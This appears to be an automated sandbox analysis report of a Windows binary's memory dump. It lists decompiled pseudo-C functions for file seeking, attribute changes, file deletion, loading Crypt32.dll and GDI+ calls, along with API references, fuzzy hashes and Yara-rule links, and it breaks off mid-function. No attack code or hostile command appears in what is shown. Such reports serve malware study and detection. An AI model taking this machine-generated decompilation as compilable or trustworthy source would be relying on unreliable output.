              0x00000000
              0x00d79baf
              0x00d79b97
              0x00d79b6e
              0x00000000
              0x00d79bcc
              0x00d79b76
              0x00000000

              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D79B8D
              • GetLastError.KERNEL32 ref: 00D79B99
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 7887ae9a2211788ef9922a0980e32b8310627ff3316db1ddd0cf50476b91a9bb
              • Instruction ID: 639ce633d3e7c5f04bdac4f916f2f3b603c19bad2a8651cbac1229cd0418fbfd
              • Opcode Fuzzy Hash: 7887ae9a2211788ef9922a0980e32b8310627ff3316db1ddd0cf50476b91a9bb
              • Instruction Fuzzy Hash: 410192727002006BD7349E29ECD476BB6DAEB85314F14C53EB18AC26C0EA74D808C631
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79903, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00D79903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E00D796E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}











              0x00d79907
              0x00d7990d
              0x00d79972
              0x00000000
              0x00d79972
              0x00d79910
              0x00d79914
              0x00d79917
              0x00d79919
              0x00d79943
              0x00d79921
              0x00d79921
              0x00d79926
              0x00d7992d
              0x00d79936
              0x00d7992f
              0x00d79931
              0x00d79931
              0x00d7993b
              0x00d7993d
              0x00d7993f
              0x00d7993f
              0x00d79926
              0x00d79948
              0x00d79957
              0x00d79962
              0x00000000
              0x00d7996e
              0x00000000
              0x00d7996e

              APIs
              • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00D79957
              • GetLastError.KERNEL32 ref: 00D79964
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorFileLastPointer
              • String ID:
              • API String ID: 2976181284-0
              • Opcode ID: 0597240ddf940f4f459340e2585a07d8df2d8fc1fe4ce974fe6953d5e323e0e3
              • Instruction ID: d8c32b35221b0607c64ee7ffe0db207b71aef021296d1f1e2717f434804d6e5e
              • Opcode Fuzzy Hash: 0597240ddf940f4f459340e2585a07d8df2d8fc1fe4ce974fe6953d5e323e0e3
              • Instruction Fuzzy Hash: EB01B5732002019BAB188E2A8C645BFB759EF41330709D21DFA6ECB261FB30DC019E70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D97B78, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00D97B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0xdd0874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00D97906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00D96763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00D97ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00D97A50(_t14);
					goto L6;
				}
				_t9 = E00D97A8A(__ecx, _a8); // executed
				return _t9;
			}










              0x00d97b78
              0x00d97b78
              0x00d97b7e
              0x00d97b83
              0x00d97b91
              0x00d97b94
              0x00d97b96
              0x00d97ba1
              0x00d97ba4
              0x00d97bcb
              0x00d97bd5
              0x00d97bdb
              0x00d97bdd
              0x00000000
              0x00000000
              0x00d97bbc
              0x00d97bbe
              0x00000000
              0x00000000
              0x00d97bc1
              0x00d97bc6
              0x00d97bc7
              0x00d97bc9
              0x00000000
              0x00000000
              0x00d97bc9
              0x00d97bb3
              0x00000000
              0x00d97bb3
              0x00d97ba6
              0x00d97bab
              0x00d97bb1
              0x00d97bb1
              0x00d97bb1
              0x00000000
              0x00d97bb1
              0x00d97b99
              0x00000000
              0x00d97b9e
              0x00d97b88
              0x00000000

              APIs
              • _free.LIBCMT ref: 00D97B99
                • Part of subcall function 00D97A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D92FA6,?,0000015D,?,?,?,?,00D94482,000000FF,00000000,?,?), ref: 00D97ABC
              • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00DB00E0,00D7CB18,?,?,?,?,?,?), ref: 00D97BD5
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AllocateHeap$_free
              • String ID:
              • API String ID: 1482568997-0
              • Opcode ID: 29a40599ce2eafe6b2f62c97066a60f373c4ea0162d68238c1b010ccaf7d653b
              • Instruction ID: 3a404bcd0b2df9aba1b70eee85b629fd4a8aa08d89ec3d588c96de908bfa1a65
              • Opcode Fuzzy Hash: 29a40599ce2eafe6b2f62c97066a60f373c4ea0162d68238c1b010ccaf7d653b
              • Instruction Fuzzy Hash: 77F09032A3D215AADF217A26DC41F6F3798DFC2BB8B194156FC18AA190DB30DC0095B5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D80574, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D80574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









              0x00d80588
              0x00d80590
              0x00000000
              0x00d80592
              0x00d80597
              0x00d8059b
              0x00d8059e
              0x00d805a0
              0x00d805a2
              0x00d805a4
              0x00d805a4
              0x00d805a5
              0x00d805a5
              0x00d805ac
              0x00000000
              0x00d805ae
              0x00d805b3

              APIs
              • GetCurrentProcess.KERNEL32(?,?), ref: 00D80581
              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D80588
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Process$AffinityCurrentMask
              • String ID:
              • API String ID: 1231390398-0
              • Opcode ID: c24b415fa54832c13d0bb626a732fe7996703dadbe2feea6a1e8a51ac480aa30
              • Instruction ID: ed1f7c9c70615cfee34e5e0186368a70d265857fec89c02970ba5c2170e01eeb
              • Opcode Fuzzy Hash: c24b415fa54832c13d0bb626a732fe7996703dadbe2feea6a1e8a51ac480aa30
              • Instruction Fuzzy Hash: 71E0D832F10209AB9F58A6A99C058FB7BEDDA49301B2551FEE943D3700FA34ED054BB4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7A12F, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E00D7A12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00D8D940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00D7B32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







              0x00d7a137
              0x00d7a13c
              0x00d7a143
              0x00d7a14b
              0x00d7a150
              0x00d7a17c
              0x00d7a17c
              0x00d7a185

              APIs
              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D79F65,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D7A143
              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D79F65,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D7A174
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 5f0fa54ebd1794409a9774f4004c4047780525ffb00dff093d7f04c8e44807f9
              • Instruction ID: 4f1c1fe5e4edc4cc888012f79026d3fd708929468c252a92c566210ccb60b935
              • Opcode Fuzzy Hash: 5f0fa54ebd1794409a9774f4004c4047780525ffb00dff093d7f04c8e44807f9
              • Instruction Fuzzy Hash: 1BF08C31140209AAEB016E659C00FEA376DAB14381F888051BC8C86260EB328999EA70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8CB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemText_swprintf
              • String ID:
              • API String ID: 3011073432-0
              • Opcode ID: 12924ed5180b3fe9ddfe9f56acaefbd3c82b169a955283982424b4f7590a0fe5
              • Instruction ID: d595ec2ec89fcad99043cff05c60ef3179c1324c8fa68783ba159290a38926fa
              • Opcode Fuzzy Hash: 12924ed5180b3fe9ddfe9f56acaefbd3c82b169a955283982424b4f7590a0fe5
              • Instruction Fuzzy Hash: A7F02B71608348BBEB11FBB0DC07FDE3B5EDB05741F044596FA09A61E2EA716A204B72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79E18, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E00D79E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00D8D940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00D7B32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







              0x00d79e20
              0x00d79e25
              0x00d79e29
              0x00d79e31
              0x00d79e36
              0x00d79e5f
              0x00d79e5f
              0x00d79e68

              APIs
              • DeleteFileW.KERNELBASE(?,?,?,00D79648,?,?,00D794A3), ref: 00D79E29
              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D79648,?,?,00D794A3), ref: 00D79E57
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 8714df06b97f13f24cf0db2c3707ea7e16c4494bc99985816075ad2bc279fc13
              • Instruction ID: 2a7325a57036633cd177234943144fd4ab4606308e96e2226a20cc9d5d425b7a
              • Opcode Fuzzy Hash: 8714df06b97f13f24cf0db2c3707ea7e16c4494bc99985816075ad2bc279fc13
              • Instruction Fuzzy Hash: 36E022311412086BDB01AF21DC00FEA736CEB08382F888062B98CC2290EB71CCD4EA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79E7F, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D79E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E00D8D940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E00D7B32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







              0x00d79e87
              0x00d79e90
              0x00d79e96
              0x00d79e9b
              0x00d79ebc
              0x00d79ec2
              0x00d79ec2
              0x00d79eca

              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,00D79E74,?,00D774F7,?,?,?,?), ref: 00D79E90
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D79E74,?,00D774F7,?,?,?,?), ref: 00D79EBC
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: e4fe79ac1d16d8c5a630f898b4c12ca569dafd396576e38142aa1dadc283b2bd
              • Instruction ID: f1537259739c2c0d9774d37108a91baaecdd3b08f485f4863a92eb6817de98d4
              • Opcode Fuzzy Hash: e4fe79ac1d16d8c5a630f898b4c12ca569dafd396576e38142aa1dadc283b2bd
              • Instruction Fuzzy Hash: 97E09232500128ABCB10AB68DC04BE9B75DEB093E1F0482A2FD9CD32D1E7709D858BF0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7FCFD, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7FCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00D8D940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E00D7B625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





              0x00d7fd05
              0x00d7fd18
              0x00d7fd20
              0x00d7fd2e
              0x00d7fd3a
              0x00d7fd3a
              0x00d7fd44

              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7FD18
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D7E7F6,Crypt32.dll,?,00D7E878,?,00D7E85C,?,?,?,?), ref: 00D7FD3A
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              • Opcode ID: 7714721c1c642480a7de5a09bdeb690930b5794dece41c0e3d2f20fe541137e8
              • Instruction ID: 8fa550f7c75b9050730bd1438c8511623316b054c2c610b8cab30f42cdd2d9fb
              • Opcode Fuzzy Hash: 7714721c1c642480a7de5a09bdeb690930b5794dece41c0e3d2f20fe541137e8
              • Instruction Fuzzy Hash: B3E0487690021C6BDB21AB95DC08FFA776CEF0D391F4444A6B94CD2144DA74D940CBF4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8938E, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00D8938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xda3398;
				if(_a8 == 0) {
					L00D8D80E(); // executed
				} else {
					L00D8D814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






              0x00d89391
              0x00d89393
              0x00d89395
              0x00d89398
              0x00d8939b
              0x00d893a3
              0x00d893a4
              0x00d893a7
              0x00d893ad
              0x00d893b6
              0x00d893af
              0x00d893af
              0x00d893af
              0x00d893bb
              0x00d893c1
              0x00d893ca

              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D893AF
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D893B6
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              • Opcode ID: c326f666ebc8ef6f7638157e9ccc286c3f6800a75159d061c21ddba71d734e90
              • Instruction ID: 3551b0b3751ee84928aca1d1f8071e11b5630c3bd212780068b89d98adc8c0d9
              • Opcode Fuzzy Hash: c326f666ebc8ef6f7638157e9ccc286c3f6800a75159d061c21ddba71d734e90
              • Instruction Fuzzy Hash: CEE0ED71905218EBCB20EF99C5056A9B7F8EB04321F14805AF88593741D7B1AE04DBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D89B08, Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D89B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0xdb75c0; // 0x7442c100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00DA1161, 0xffffffff);
				L00D8D826(); // executed
				_t7 =  *0xdadff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}








              0x00d89b19
              0x00d89b20
              0x00d89b2b
              0x00d89b31
              0x00d89b36
              0x00d89b3f
              0x00d89b4a

              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,00DA1161,000000FF), ref: 00D89B31
              • OleUninitialize.OLE32(?,?,?,00DA1161,000000FF), ref: 00D89B36
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: 3d818097e8aaafc3d244287dbcb9985d87e7502fea172556424f973c43237ab3
              • Instruction ID: e0f46421c9b56149c70557e70c1a604192ec5c13549aec178ac61b0dceaab365
              • Opcode Fuzzy Hash: 3d818097e8aaafc3d244287dbcb9985d87e7502fea172556424f973c43237ab3
              • Instruction Fuzzy Hash: 0AE01A36548744DFC720DB48DC46B56B7E9FB49B20F004769B91AC3B90CB356800CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D91726, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00D91726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00D9281A(__eflags, E00D9166A); // executed
				 *0xdad680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00D928C8(__eflags, _t1, 0xdd01dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00D91759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






              0x00d9172b
              0x00d91730
              0x00d91739
              0x00d91744
              0x00d9174a
              0x00d9174b
              0x00d9174d
              0x00d91758
              0x00d9174f
              0x00d9174f
              0x00000000
              0x00d9174f
              0x00d9173b
              0x00d9173b
              0x00d9173d
              0x00d9173d

              APIs
                • Part of subcall function 00D9281A: try_get_function.LIBVCRUNTIME ref: 00D9282F
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D91744
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D9174F
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 49946edba442025fad4ee4b5d383e76b71a0d54d072a18e12fdbcdb289b17436
              • Instruction ID: aa703e53aacad6c7caefb414f594db76c0861a8708c556a7a136836d2c7142be
              • Opcode Fuzzy Hash: 49946edba442025fad4ee4b5d383e76b71a0d54d072a18e12fdbcdb289b17436
              • Instruction Fuzzy Hash: 62D0C96DA44707A85F047AF478129692B48D9527B07F44A56F021CA5C2EA34800B6535
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D712B2, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D712B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




              0x00d712b9
              0x00d712ce
              0x00d712d4

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: a5a3f4ca6cdf0bc4d23330ba68eeb5c35d02324ca9bb78a6b4a8904c444c8c79
              • Instruction ID: 53c880772aa49b0762fa5bfc6aa4418c655fa77458bd1af7653c1b6ba95646ef
              • Opcode Fuzzy Hash: a5a3f4ca6cdf0bc4d23330ba68eeb5c35d02324ca9bb78a6b4a8904c444c8c79
              • Instruction Fuzzy Hash: 8DC01272058280BECB011BB0DC09D2FBBAAAFA6212F04C908F0A7C01A0CA38C010DB21
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D71973, Relevance: 1.8, APIs: 1, Instructions: 285COMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00D71973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
